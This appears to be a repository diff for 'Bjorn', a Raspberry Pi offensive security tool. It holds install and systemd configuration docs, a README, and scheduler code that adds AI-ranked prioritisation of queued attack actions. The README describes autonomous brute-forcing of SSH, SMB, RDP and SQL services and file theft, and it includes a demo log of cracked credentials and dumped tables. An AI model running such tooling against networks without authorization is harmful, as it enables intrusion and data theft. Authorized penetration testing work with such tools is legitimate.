Press Esc to exit insert mode
Type :wq and press Enter to save and quit
#### Step 4: Configure File Descriptor Limits
To prevent `OSError: [Errno 24] Too many open files`, it's essential to increase the file descriptor limits.
##### 4.1: Modify File Descriptor Limits for All Users
Edit `/etc/security/limits.conf`:
```bash
sudo vi /etc/security/limits.conf
```
Add the following lines:
```
* soft nofile 65535
* hard nofile 65535
root soft nofile 65535
root hard nofile 65535
```
##### 4.2: Configure Systemd Limits
Edit `/etc/systemd/system.conf`:
```bash
sudo vi /etc/systemd/system.conf
```
Uncomment and modify:
```
DefaultLimitNOFILE=65535
```
Edit `/etc/systemd/user.conf`:
```bash
sudo vi /etc/systemd/user.conf
```
Uncomment and modify:
```
DefaultLimitNOFILE=65535
```
##### 4.3: Create or Modify `/etc/security/limits.d/90-nofile.conf`
```bash
sudo vi /etc/security/limits.d/90-nofile.conf
```
Add:
```
root soft nofile 65535
root hard nofile 65535
```
##### 4.4: Adjust the System-wide File Descriptor Limit
Edit `/etc/sysctl.conf`:
```bash
sudo vi /etc/sysctl.conf
```
Add:
```
fs.file-max = 2097152
```
Apply the changes:
```bash
sudo sysctl -p
```
#### Step 5: Reload Systemd and Apply Changes
Reload systemd to apply the new file descriptor limits:
```bash
sudo systemctl daemon-reload
```
#### Step 6: Modify PAM Configuration Files
PAM (Pluggable Authentication Modules) manages how limits are enforced for user sessions. To ensure that the new file descriptor limits are respected, update the following configuration files.
##### Step 6.1: Edit `/etc/pam.d/common-session` and `/etc/pam.d/common-session-noninteractive`
```bash
sudo vi /etc/pam.d/common-session
sudo vi /etc/pam.d/common-session-noninteractive
```
Add this line at the end of both files:
```
session required pam_limits.so
```
This ensures that the limits set in `/etc/security/limits.conf` are enforced for all user sessions.
#### Step 7: Configure Services
##### 7.1: Bjorn Service
Create the service file:
```bash
sudo vi /etc/systemd/system/bjorn.service
```
Add the following content:
```ini
[Unit]
Description=Bjorn Service
DefaultDependencies=no
Before=basic.target
After=local-fs.target
[Service]
ExecStartPre=/home/bjorn/Bjorn/kill_port_8000.sh
ExecStart=/usr/bin/python3 /home/bjorn/Bjorn/Bjorn.py
WorkingDirectory=/home/bjorn/Bjorn
StandardOutput=inherit
StandardError=inherit
Restart=always
User=root
# Check open files and restart if it reached the limit (ulimit -n buffer of 1000)
ExecStartPost=/bin/bash -c 'FILE_LIMIT=$(ulimit -n); THRESHOLD=$(( FILE_LIMIT - 1000 )); while :; do TOTAL_OPEN_FILES=$(lsof | wc -l); if [ "$TOTAL_OPEN_FILES" -ge "$THRESHOLD" ]; then echo "File descriptor threshold reached: $TOTAL_OPEN_FILES (threshold: $THRESHOLD). Restarting service."; systemctl restart bjorn.service; exit 0; fi; sleep 10; done &'
[Install]
WantedBy=multi-user.target
```
##### 7.2: Port 8000 Killer Script
Create the script to free up port 8000:
```bash
vi /home/bjorn/Bjorn/kill_port_8000.sh
```
Add:
```bash
#!/bin/bash
PORT=8000
PIDS=$(lsof -t -i:$PORT)
if [ -n "$PIDS" ]; then
echo "Killing PIDs using port $PORT: $PIDS"
kill -9 $PIDS
fi
```
Make the script executable:
```bash
chmod +x /home/bjorn/Bjorn/kill_port_8000.sh
```
##### 7.3: USB Gadget Configuration
Modify `/boot/firmware/cmdline.txt`:
```bash
sudo vi /boot/firmware/cmdline.txt
```
Add the following right after `rootwait`:
```
modules-load=dwc2,g_ether
```
Modify `/boot/firmware/config.txt`:
```bash
sudo vi /boot/firmware/config.txt
```
Add at the end of the file:
```
dtoverlay=dwc2
```
Create the USB gadget script:
```bash
sudo vi /usr/local/bin/usb-gadget.sh
```
Add the following content:
```bash
#!/bin/bash
set -e
modprobe libcomposite
cd /sys/kernel/config/usb_gadget/
mkdir -p g1
cd g1
echo 0x1d6b > idVendor
echo 0x0104 > idProduct
echo 0x0100 > bcdDevice
echo 0x0200 > bcdUSB
mkdir -p strings/0x409
echo "fedcba9876543210" > strings/0x409/serialnumber
echo "Raspberry Pi" > strings/0x409/manufacturer
echo "Pi Zero USB" > strings/0x409/product
mkdir -p configs/c.1/strings/0x409
echo "Config 1: ECM network" > configs/c.1/strings/0x409/configuration
echo 250 > configs/c.1/MaxPower
mkdir -p functions/ecm.usb0
# Check for existing symlink and remove if necessary
if [ -L configs/c.1/ecm.usb0 ]; then
rm configs/c.1/ecm.usb0
fi
ln -s functions/ecm.usb0 configs/c.1/
# Ensure the device is not busy before listing available USB device controllers
max_retries=10
retry_count=0
while ! ls /sys/class/udc > UDC 2>/dev/null; do
if [ $retry_count -ge $max_retries ]; then
echo "Error: Device or resource busy after $max_retries attempts."
exit 1
fi
retry_count=$((retry_count + 1))
sleep 1
done
# Check if the usb0 interface is already configured
if ! ip addr show usb0 | grep -q "172.20.2.1"; then
ifconfig usb0 172.20.2.1 netmask 255.255.255.0
else
echo "Interface usb0 already configured."
fi
```
Make the script executable:
```bash
sudo chmod +x /usr/local/bin/usb-gadget.sh
```
Create the systemd service:
```bash
sudo vi /etc/systemd/system/usb-gadget.service
```
Add:
```ini
[Unit]
Description=USB Gadget Service
After=network.target
[Service]
ExecStartPre=/sbin/modprobe libcomposite
ExecStart=/usr/local/bin/usb-gadget.sh
Type=simple
RemainAfterExit=yes
[Install]
WantedBy=multi-user.target
```
Configure `usb0`:
```bash
sudo vi /etc/network/interfaces
```
Add:
```bash
allow-hotplug usb0
iface usb0 inet static
address 172.20.2.1
netmask 255.255.255.0
```
Reload the services:
```bash
sudo systemctl daemon-reload
sudo systemctl enable systemd-networkd
sudo systemctl enable usb-gadget
sudo systemctl start systemd-networkd
sudo systemctl start usb-gadget
```
You must reboot to be able to use it as a USB gadget (with ip)
###### Windows PC Configuration
Set the static IP address on your Windows PC:
- **IP Address**: `172.20.2.2`
- **Subnet Mask**: `255.255.255.0`
- **Default Gateway**: `172.20.2.1`
- **DNS Servers**: `8.8.8.8`, `8.8.4.4`
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

21
LICENSE
View File

@@ -1,21 +0,0 @@
MIT License
Copyright (c) 2024 infinition
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

179
README.md
View File

@@ -1,179 +0,0 @@
# <img src="https://github.com/user-attachments/assets/c5eb4cc1-0c3d-497d-9422-1614651a84ab" alt="thumbnail_IMG_0546" width="33"> Bjorn
![Python](https://img.shields.io/badge/Python-3776AB?logo=python&logoColor=fff)
![Status](https://img.shields.io/badge/Status-Development-blue.svg)
[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)
[![Reddit](https://img.shields.io/badge/Reddit-Bjorn__CyberViking-orange?style=for-the-badge&logo=reddit)](https://www.reddit.com/r/Bjorn_CyberViking)
[![Discord](https://img.shields.io/badge/Discord-Join%20Us-7289DA?style=for-the-badge&logo=discord)](https://discord.com/invite/B3ZH9taVfT)
<p align="center">
<img src="https://github.com/user-attachments/assets/c5eb4cc1-0c3d-497d-9422-1614651a84ab" alt="thumbnail_IMG_0546" width="150">
<img src="https://github.com/user-attachments/assets/1b490f07-f28e-4418-8d41-14f1492890c6" alt="bjorn_epd-removebg-preview" width="150">
</p>
Bjorn is a « Tamagotchi like » sophisticated, autonomous network scanning, vulnerability assessment, and offensive security tool designed to run on a Raspberry Pi equipped with a 2.13-inch e-Paper HAT. This document provides a detailed explanation of the project.
## 📚 Table of Contents
- [Introduction](#-introduction)
- [Features](#-features)
- [Getting Started](#-getting-started)
- [Prerequisites](#-prerequisites)
- [Installation](#-installation)
- [Quick Start](#-quick-start)
- [Usage Example](#-usage-example)
- [Contributing](#-contributing)
- [License](#-license)
- [Contact](#-contact)
## 📄 Introduction
Bjorn is a powerful tool designed to perform comprehensive network scanning, vulnerability assessment, and data ex-filtration. Its modular design and extensive configuration options allow for flexible and targeted operations. By combining different actions and orchestrating them intelligently, Bjorn can provide valuable insights into network security and help identify and mitigate potential risks.
The e-Paper HAT display and web interface make it easy to monitor and interact with Bjorn, providing real-time updates and status information. With its extensible architecture and customizable actions, Bjorn can be adapted to suit a wide range of security testing and monitoring needs.
## 🌟 Features
- **Network Scanning**: Identifies live hosts and open ports on the network.
- **Vulnerability Assessment**: Performs vulnerability scans using Nmap and other tools.
- **System Attacks**: Conducts brute-force attacks on various services (FTP, SSH, SMB, RDP, Telnet, SQL).
- **File Stealing**: Extracts data from vulnerable services.
- **User Interface**: Real-time display on the e-Paper HAT and web interface for monitoring and interaction.
[![Architecture](https://img.shields.io/badge/ARCHITECTURE-Read_Docs-ff69b4?style=for-the-badge&logo=github)](./ARCHITECTURE.md)
![Bjorn Display](https://github.com/infinition/Bjorn/assets/37984399/bcad830d-77d6-4f3e-833d-473eadd33921)
## 🚀 Getting Started
## 📌 Prerequisites
### 📋 Prerequisites for RPI zero W (32bits)
![image](https://github.com/user-attachments/assets/3980ec5f-a8fc-4848-ab25-4356e0529639)
- Raspberry Pi OS installed.
- Stable:
- System: 32-bit
- Kernel version: 6.6
- Debian version: 12 (bookworm) '2024-10-22-raspios-bookworm-armhf-lite'
- Username and hostname set to `bjorn`.
- 2.13-inch e-Paper HAT connected to GPIO pins.
### 📋 Prerequisites for RPI zero W2 (64bits)
![image](https://github.com/user-attachments/assets/e8d276be-4cb2-474d-a74d-b5b6704d22f5)
I did not develop Bjorn for the raspberry pi zero w2 64bits, but several feedbacks have attested that the installation worked perfectly.
- Raspberry Pi OS installed.
- Stable:
- System: 64-bit
- Kernel version: 6.6
- Debian version: 12 (bookworm) '2024-10-22-raspios-bookworm-arm64-lite'
- Username and hostname set to `bjorn`.
- 2.13-inch e-Paper HAT connected to GPIO pins.
At the moment the paper screen v2 v4 have been tested and implemented.
I juste hope the V1 & V3 will work the same.
### 🔨 Installation
The fastest way to install Bjorn is using the automatic installation script :
```bash
# Download and run the installer
wget https://raw.githubusercontent.com/infinition/Bjorn/refs/heads/main/install_bjorn.sh
sudo chmod +x install_bjorn.sh && sudo ./install_bjorn.sh
# Choose the choice 1 for automatic installation. It may take a while as a lot of packages and modules will be installed. You must reboot at the end.
```
For **detailed information** about **installation** process go to [Install Guide](INSTALL.md)
## ⚡ Quick Start
**Need help ? You struggle to find Bjorn's IP after the installation ?**
Use my Bjorn Detector & SSH Launcher :
[https://github.com/infinition/bjorn-detector](https://github.com/infinition/bjorn-detector)
![ezgif-1-a310f5fe8f](https://github.com/user-attachments/assets/182f82f0-5c3a-48a9-a75e-37b9cfa2263a)
**Hmm, You still need help ?**
For **detailed information** about **troubleshooting** go to [Troubleshooting](TROUBLESHOOTING.md)
**Quick Installation**: you can use the fastest way to install **Bjorn** [Getting Started](#-getting-started)
## 💡 Usage Example
Here's a demonstration of how Bjorn autonomously hunts through your network like a Viking raider (fake demo for illustration):
```bash
# Reconnaissance Phase
[NetworkScanner] Discovering alive hosts...
[+] Host found: 192.168.1.100
├── Ports: 22,80,445,3306
└── MAC: 00:11:22:33:44:55
# Attack Sequence
[NmapVulnScanner] Found vulnerabilities on 192.168.1.100
├── MySQL 5.5 < 5.7 - User Enumeration
└── SMB - EternalBlue Candidate
[SSHBruteforce] Cracking credentials...
[+] Success! user:password123
[StealFilesSSH] Extracting sensitive data...
# Automated Data Exfiltration
[SQLBruteforce] Database accessed!
[StealDataSQL] Dumping tables...
[SMBBruteforce] Share accessible
[+] Found config files, credentials, backups...
```
This is just a demo output - actual results will vary based on your network and target configuration.
All discovered data is automatically organized in the data/output/ directory, viewable through both the e-Paper display (as indicators) and web interface.
Bjorn works tirelessly, expanding its network knowledge base and growing stronger with each discovery.
No constant monitoring needed - just deploy and let Bjorn do what it does best: hunt for vulnerabilities.
🔧 Expand Bjorn's Arsenal!
Bjorn is designed to be a community-driven weapon forge. Create and share your own attack modules!
⚠️ **For educational and authorized testing purposes only** ⚠️
## 🤝 Contributing
The project welcomes contributions in:
- New attack modules.
- Bug fixes.
- Documentation.
- Feature improvements.
For **detailed information** about **contributing** process go to [Contributing Docs](CONTRIBUTING.md), [Code Of Conduct](CODE_OF_CONDUCT.md) and [Development Guide](DEVELOPMENT.md).
## 📫 Contact
- **Report Issues**: Via GitHub.
- **Guidelines**:
- Follow ethical guidelines.
- Document reproduction steps.
- Provide logs and context.
- **Author**: __infinition__
- **GitHub**: [infinition/Bjorn](https://github.com/infinition/Bjorn)
## 🌠 Stargazers
[![Star History Chart](https://api.star-history.com/svg?repos=infinition/bjorn&type=Date)](https://star-history.com/#infinition/bjorn&Date)
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

View File

@@ -1,48 +0,0 @@
# 🔒 Security Policy
Security Policy for **Bjorn** repository includes all required compliance matrix and artifact mapping.
## 🧮 Supported Versions
We provide security updates for the following versions of our project:
| Version | Status | Secure |
| ------- |-------------| ------ |
| 1.0.0 | Development | No |
## 🛡️ Security Practices
- We follow best practices for secure coding and infrastructure management.
- Regular security audits and code reviews are conducted to identify and mitigate potential risks.
- Dependencies are monitored and updated to address known vulnerabilities.
## 📲 Security Updates
- Security updates are released as soon as possible after a vulnerability is confirmed.
- Users are encouraged to update to the latest version to benefit from security fixes.
## 🚨 Reporting a Vulnerability
If you discover a security vulnerability within this project, please follow these steps:
1. **Do not create a public issue.** Instead, contact us directly to responsibly disclose the vulnerability.
2. **Email** [bjorn-cyberviking@outlook.com](mailto:bjorn-cyberviking@outlook.com) with the following information:
- A description of the vulnerability.
- Steps to reproduce the issue.
- Any potential impact or severity.
3. **Wait for a response.** We will acknowledge your report and work with you to address the issue promptly.
## 🛰️ Additional Resources
- [OWASP Security Guidelines](https://owasp.org/)
Thank you for helping us keep this project secure!
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

View File

@@ -1,80 +0,0 @@
# 🐛 Known Issues and Troubleshooting
<p align="center">
<img src="https://github.com/user-attachments/assets/c5eb4cc1-0c3d-497d-9422-1614651a84ab" alt="thumbnail_IMG_0546" width="98">
</p>
## 📚 Table of Contents
- [Current Development Issues](#-current-development-issues)
- [Troubleshooting Steps](#-troubleshooting-steps)
- [License](#-license)
## 🪲 Current Development Issues
### Long Runtime Issue
- **Problem**: `OSError: [Errno 24] Too many open files`
- **Status**: Partially resolved with system limits configuration.
- **Workaround**: Implemented file descriptor limits increase.
- **Monitoring**: Check open files with `lsof -p $(pgrep -f Bjorn.py) | wc -l`
- At the moment the logs show periodically this information as (FD : XXX)
## 🛠️ Troubleshooting Steps
### Service Issues
```bash
#See bjorn journalctl service
journalctl -fu bjorn.service
# Check service status
sudo systemctl status bjorn.service
# View detailed logs
sudo journalctl -u bjorn.service -f
or
sudo tail -f /home/bjorn/Bjorn/data/logs/*
# Check port 8000 usage
sudo lsof -i :8000
```
### Display Issues
```bash
# Verify SPI devices
ls /dev/spi*
# Check user permissions
sudo usermod -a -G spi,gpio bjorn
```
### Network Issues
```bash
# Check network interfaces
ip addr show
# Test USB gadget interface
ip link show usb0
```
### Permission Issues
```bash
# Fix ownership
sudo chown -R bjorn:bjorn /home/bjorn/Bjorn
# Fix permissions
sudo chmod -R 755 /home/bjorn/Bjorn
```
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

View File

@@ -1,4 +1,4 @@
# action_scheduler.py # action_scheduler.py testsdd
# Smart Action Scheduler for Bjorn - queue-only implementation # Smart Action Scheduler for Bjorn - queue-only implementation
# Handles trigger evaluation, requirements checking, and queue management. # Handles trigger evaluation, requirements checking, and queue management.
# #
@@ -24,6 +24,7 @@ from typing import Any, Dict, List, Optional, Tuple
from init_shared import shared_data from init_shared import shared_data
from logger import Logger from logger import Logger
from ai_engine import get_or_create_ai_engine
logger = Logger(name="action_scheduler.py") logger = Logger(name="action_scheduler.py")
@@ -73,6 +74,8 @@ class ActionScheduler:
# Runtime flags # Runtime flags
self.running = True self.running = True
self.check_interval = 5 # seconds between iterations self.check_interval = 5 # seconds between iterations
self._stop_event = threading.Event()
self._error_backoff = 1.0
# Action definition cache # Action definition cache
self._action_definitions: Dict[str, Dict[str, Any]] = {} self._action_definitions: Dict[str, Dict[str, Any]] = {}
@@ -85,6 +88,22 @@ class ActionScheduler:
self._last_source_is_studio: Optional[bool] = None self._last_source_is_studio: Optional[bool] = None
# Enforce DB invariants (idempotent) # Enforce DB invariants (idempotent)
self._ensure_db_invariants() self._ensure_db_invariants()
# Throttling for priorities
self._last_priority_update = 0.0
self._priority_update_interval = 60.0 # seconds
# Initialize AI engine for recommendations ONLY in AI mode.
# Uses singleton so model weights are loaded only once across the process.
self.ai_engine = None
if self.shared_data.operation_mode == "AI":
self.ai_engine = get_or_create_ai_engine(self.shared_data)
if self.ai_engine is None:
logger.info_throttled(
"AI engine unavailable in scheduler; continuing heuristic-only",
key="scheduler_ai_init_failed",
interval_s=300.0,
)
logger.info("ActionScheduler initialized") logger.info("ActionScheduler initialized")
@@ -95,8 +114,24 @@ class ActionScheduler:
logger.info("ActionScheduler starting main loop") logger.info("ActionScheduler starting main loop")
while self.running and not self.shared_data.orchestrator_should_exit: while self.running and not self.shared_data.orchestrator_should_exit:
try: try:
# If the user toggles AI mode at runtime, enable/disable AI engine without restart.
if self.shared_data.operation_mode == "AI" and self.ai_engine is None:
self.ai_engine = get_or_create_ai_engine(self.shared_data)
if self.ai_engine:
logger.info("Scheduler: AI engine enabled (singleton)")
else:
logger.info_throttled(
"Scheduler: AI engine unavailable; staying heuristic-only",
key="scheduler_ai_enable_failed",
interval_s=300.0,
)
elif self.shared_data.operation_mode != "AI" and self.ai_engine is not None:
self.ai_engine = None
# Refresh action cache if needed # Refresh action cache if needed
self._refresh_cache_if_needed() self._refresh_cache_if_needed()
# Keep queue consistent with current enable/disable flags.
self._cancel_queued_disabled_actions()
# 1) Promote scheduled actions that are due # 1) Promote scheduled actions that are due
self._promote_scheduled_to_pending() self._promote_scheduled_to_pending()
@@ -114,21 +149,260 @@ class ActionScheduler:
self.cleanup_queue() self.cleanup_queue()
self.update_priorities() self.update_priorities()
time.sleep(self.check_interval) self._error_backoff = 1.0
if self._stop_event.wait(self.check_interval):
break
except Exception as e: except Exception as e:
logger.error(f"Error in scheduler loop: {e}") logger.error(f"Error in scheduler loop: {e}")
time.sleep(self.check_interval) if self._stop_event.wait(self._error_backoff):
break
self._error_backoff = min(self._error_backoff * 2.0, 15.0)
logger.info("ActionScheduler stopped") logger.info("ActionScheduler stopped")
# ----------------------------------------------------------------- priorities
def update_priorities(self):
"""
Update priorities of pending actions.
1. Increase priority over time (starvation prevention) with MIN(100) cap.
2. [AI Mode] Boost priority of actions recommended by AI engine.
"""
now = time.time()
if now - self._last_priority_update < self._priority_update_interval:
return
try:
# 1. Anti-starvation aging: +1 per minute for actions waiting >1 hour.
# julianday is portable across all SQLite builds.
# MIN(100) cap prevents unbounded priority inflation.
affected = self.db.execute(
"""
UPDATE action_queue
SET priority = MIN(100, priority + 1)
WHERE status='pending'
AND julianday('now') - julianday(created_at) > 0.0417
"""
)
self._last_priority_update = now
if affected and affected > 0:
logger.debug(f"Aged {affected} pending actions in queue")
# 2. AI Recommendation Boost
if self.shared_data.operation_mode == "AI" and self.ai_engine:
self._apply_ai_priority_boost()
elif self.shared_data.operation_mode == "AI" and not self.ai_engine:
logger.warning("Operation mode is AI, but ai_engine is not initialized!")
except Exception as e:
logger.error(f"Failed to update priorities: {e}")
def _apply_ai_priority_boost(self):
"""Boost priority of actions recommended by AI engine."""
try:
if not self.ai_engine:
logger.warning("AI Boost skipped: ai_engine is None")
return
# Get list of unique hosts with pending actions
hosts = self.db.query("""
SELECT DISTINCT mac_address FROM action_queue
WHERE status='pending'
""")
if not hosts:
return
for row in hosts:
mac = row['mac_address']
if not mac:
continue
# Get available actions for this host
available = [
r['action_name'] for r in self.db.query("""
SELECT DISTINCT action_name FROM action_queue
WHERE mac_address=? AND status='pending'
""", (mac,))
]
if not available:
continue
# Get host context
host_data = self.db.get_host_by_mac(mac)
if not host_data:
continue
context = {
'mac': mac,
'hostname': (host_data.get('hostnames') or '').split(';')[0],
'ports': [
int(p) for p in (host_data.get('ports') or '').split(';')
if p.isdigit()
]
}
# Ask AI for recommendation
recommended_action, confidence, debug = self.ai_engine.choose_action(
host_context=context,
available_actions=available,
exploration_rate=0.0 # No exploration in scheduler
)
if not isinstance(debug, dict):
debug = {}
threshold = self._get_ai_confirm_threshold()
if recommended_action and confidence >= threshold: # Only boost if confident
# Boost recommended action
boost_amount = int(20 * confidence) # Scale boost by confidence
affected = self.db.execute("""
UPDATE action_queue
SET priority = priority + ?
WHERE mac_address=? AND action_name=? AND status='pending'
""", (boost_amount, mac, recommended_action))
if affected and affected > 0:
# NEW: Update metadata to reflect AI influence
try:
# We fetch all matching IDs to update their metadata
rows = self.db.query("""
SELECT id, metadata FROM action_queue
WHERE mac_address=? AND action_name=? AND status='pending'
""", (mac, recommended_action))
for row in rows:
meta = json.loads(row['metadata'] or '{}')
meta['decision_method'] = f"ai_boosted ({debug.get('method', 'unknown')})"
meta['decision_origin'] = "ai_boosted"
meta['decision_scope'] = "priority_boost"
meta['ai_confidence'] = confidence
meta['ai_threshold'] = threshold
meta['ai_method'] = str(debug.get('method', 'unknown'))
meta['ai_recommended_action'] = recommended_action
meta['ai_model_loaded'] = bool(getattr(self.ai_engine, "model_loaded", False))
meta['ai_reason'] = "priority_boost_applied"
meta['ai_debug'] = debug # Includes all_scores and input_vector
self.db.execute("UPDATE action_queue SET metadata=? WHERE id=?",
(json.dumps(meta), row['id']))
except Exception as meta_e:
logger.error(f"Failed to update metadata for AI boost: {meta_e}")
logger.info(
f"[AI_BOOST] action={recommended_action} mac={mac} boost={boost_amount} "
f"conf={float(confidence):.2f} thr={float(threshold):.2f} "
f"method={debug.get('method', 'unknown')}"
)
except Exception as e:
logger.error(f"Error applying AI priority boost: {e}")
def stop(self): def stop(self):
"""Stop the scheduler.""" """Stop the scheduler."""
logger.info("Stopping ActionScheduler...") logger.info("Stopping ActionScheduler...")
self.running = False self.running = False
self._stop_event.set()
# --------------------------------------------------------------- definitions # --------------------------------------------------------------- definitions
def _get_ai_confirm_threshold(self) -> float:
"""Return normalized AI confirmation threshold in [0.0, 1.0]."""
try:
raw = float(getattr(self.shared_data, "ai_confirm_threshold", 0.3))
except Exception:
raw = 0.3
return max(0.0, min(1.0, raw))
def _annotate_decision_metadata(
self,
metadata: Dict[str, Any],
action_name: str,
context: Dict[str, Any],
decision_scope: str,
) -> None:
"""
Fill metadata with a consistent decision trace:
decision_method/origin + AI method/confidence/threshold/reason.
"""
metadata.setdefault("decision_method", "heuristic")
metadata.setdefault("decision_origin", "heuristic")
metadata["decision_scope"] = decision_scope
threshold = self._get_ai_confirm_threshold()
metadata["ai_threshold"] = threshold
if self.shared_data.operation_mode != "AI":
metadata["ai_reason"] = "ai_mode_disabled"
return
if not self.ai_engine:
metadata["ai_reason"] = "ai_engine_unavailable"
return
try:
recommended, confidence, debug = self.ai_engine.choose_action(
host_context=context,
available_actions=[action_name],
exploration_rate=0.0,
)
ai_method = str((debug or {}).get("method", "unknown"))
confidence_f = float(confidence or 0.0)
model_loaded = bool(getattr(self.ai_engine, "model_loaded", False))
metadata["ai_method"] = ai_method
metadata["ai_confidence"] = confidence_f
metadata["ai_recommended_action"] = recommended or ""
metadata["ai_model_loaded"] = model_loaded
if recommended == action_name and confidence_f >= threshold:
metadata["decision_method"] = f"ai_confirmed ({ai_method})"
metadata["decision_origin"] = "ai_confirmed"
metadata["ai_reason"] = "recommended_above_threshold"
elif recommended != action_name:
metadata["decision_origin"] = "heuristic"
metadata["ai_reason"] = "recommended_different_action"
else:
metadata["decision_origin"] = "heuristic"
metadata["ai_reason"] = "confidence_below_threshold"
except Exception as e:
metadata["ai_reason"] = "ai_check_failed"
logger.debug(f"AI decision annotation failed for {action_name}: {e}")
def _log_queue_decision(
self,
action_name: str,
mac: str,
metadata: Dict[str, Any],
target_port: Optional[int] = None,
target_service: Optional[str] = None,
) -> None:
"""Emit a compact, explicit queue-decision log line."""
decision = str(metadata.get("decision_method", "heuristic"))
origin = str(metadata.get("decision_origin", "heuristic"))
ai_method = str(metadata.get("ai_method", "n/a"))
ai_reason = str(metadata.get("ai_reason", "n/a"))
ai_conf = metadata.get("ai_confidence")
ai_thr = metadata.get("ai_threshold")
scope = str(metadata.get("decision_scope", "unknown"))
conf_txt = f"{float(ai_conf):.2f}" if isinstance(ai_conf, (int, float)) else "n/a"
thr_txt = f"{float(ai_thr):.2f}" if isinstance(ai_thr, (int, float)) else "n/a"
model_loaded = bool(metadata.get("ai_model_loaded", False))
port_txt = "None" if target_port is None else str(target_port)
svc_txt = target_service if target_service else "None"
logger.info(
f"[QUEUE_DECISION] scope={scope} action={action_name} mac={mac} port={port_txt} service={svc_txt} "
f"decision={decision} origin={origin} ai_method={ai_method} conf={conf_txt} thr={thr_txt} "
f"model_loaded={model_loaded} reason={ai_reason}"
)
# ---------- replace this method ---------- # ---------- replace this method ----------
def _refresh_cache_if_needed(self): def _refresh_cache_if_needed(self):
"""Refresh action definitions cache if expired or source flipped.""" """Refresh action definitions cache if expired or source flipped."""
@@ -160,6 +434,9 @@ class ActionScheduler:
# Build cache (expect same action schema: b_class, b_trigger, b_action, etc.) # Build cache (expect same action schema: b_class, b_trigger, b_action, etc.)
self._action_definitions = {a["b_class"]: a for a in actions} self._action_definitions = {a["b_class"]: a for a in actions}
# Runtime truth: orchestrator loads from `actions`, so align b_enabled to it
# even when scheduler uses `actions_studio` as source.
self._overlay_runtime_enabled_flags()
logger.info(f"Refreshed action cache from '{source}': {len(self._action_definitions)} actions") logger.info(f"Refreshed action cache from '{source}': {len(self._action_definitions)} actions")
except AttributeError as e: except AttributeError as e:
@@ -179,6 +456,67 @@ class ActionScheduler:
except Exception as e: except Exception as e:
logger.error(f"Failed to refresh action cache: {e}") logger.error(f"Failed to refresh action cache: {e}")
def _is_action_enabled(self, action_def: Dict[str, Any]) -> bool:
"""Parse b_enabled robustly across int/bool/string/null values."""
raw = action_def.get("b_enabled", 1)
if raw is None:
return True
if isinstance(raw, bool):
return raw
if isinstance(raw, (int, float)):
return int(raw) == 1
s = str(raw).strip().lower()
if s in {"1", "true", "yes", "on"}:
return True
if s in {"0", "false", "no", "off"}:
return False
try:
return int(float(s)) == 1
except Exception:
# Conservative default: keep action enabled when value is malformed.
return True
def _overlay_runtime_enabled_flags(self):
"""
Override cached `b_enabled` with runtime `actions` table values.
This keeps scheduler decisions aligned with orchestrator loaded actions.
"""
try:
runtime_rows = self.db.list_actions()
runtime_map = {r.get("b_class"): r.get("b_enabled", 1) for r in runtime_rows}
for action_name, action_def in self._action_definitions.items():
if action_name in runtime_map:
action_def["b_enabled"] = runtime_map[action_name]
except Exception as e:
logger.warning(f"Could not overlay runtime b_enabled flags: {e}")
def _cancel_queued_disabled_actions(self):
"""Cancel pending/scheduled queue entries for currently disabled actions."""
try:
disabled = [
name for name, definition in self._action_definitions.items()
if not self._is_action_enabled(definition)
]
if not disabled:
return
placeholders = ",".join("?" for _ in disabled)
affected = self.db.execute(
f"""
UPDATE action_queue
SET status='cancelled',
completed_at=CURRENT_TIMESTAMP,
error_message=COALESCE(error_message, 'disabled_by_config')
WHERE status IN ('scheduled','pending')
AND action_name IN ({placeholders})
""",
tuple(disabled),
)
if affected:
logger.info(f"Cancelled {affected} queued action(s) because b_enabled=0")
except Exception as e:
logger.error(f"Failed to cancel queued disabled actions: {e}")
# ------------------------------------------------------------------ helpers # ------------------------------------------------------------------ helpers
@@ -248,7 +586,7 @@ class ActionScheduler:
for action in self._action_definitions.values(): for action in self._action_definitions.values():
if (action.get("b_action") or "normal") != "global": if (action.get("b_action") or "normal") != "global":
continue continue
if int(action.get("b_enabled", 1) or 1) != 1: if not self._is_action_enabled(action):
continue continue
trigger = (action.get("b_trigger") or "").strip() trigger = (action.get("b_trigger") or "").strip()
@@ -275,7 +613,7 @@ class ActionScheduler:
for action in self._action_definitions.values(): for action in self._action_definitions.values():
if (action.get("b_action") or "normal") == "global": if (action.get("b_action") or "normal") == "global":
continue continue
if int(action.get("b_enabled", 1) or 1) != 1: if not self._is_action_enabled(action):
continue continue
trigger = (action.get("b_trigger") or "").strip() trigger = (action.get("b_trigger") or "").strip()
@@ -309,6 +647,19 @@ class ActionScheduler:
next_run = _utcnow() if not last else (last + timedelta(seconds=interval)) next_run = _utcnow() if not last else (last + timedelta(seconds=interval))
scheduled_for = _db_ts(next_run) scheduled_for = _db_ts(next_run)
metadata = {
"interval": interval,
"is_global": True,
"decision_method": "heuristic",
"decision_origin": "heuristic",
}
self._annotate_decision_metadata(
metadata=metadata,
action_name=action_name,
context={"mac": mac, "hostname": "Bjorn-C2", "ports": []},
decision_scope="scheduled_global",
)
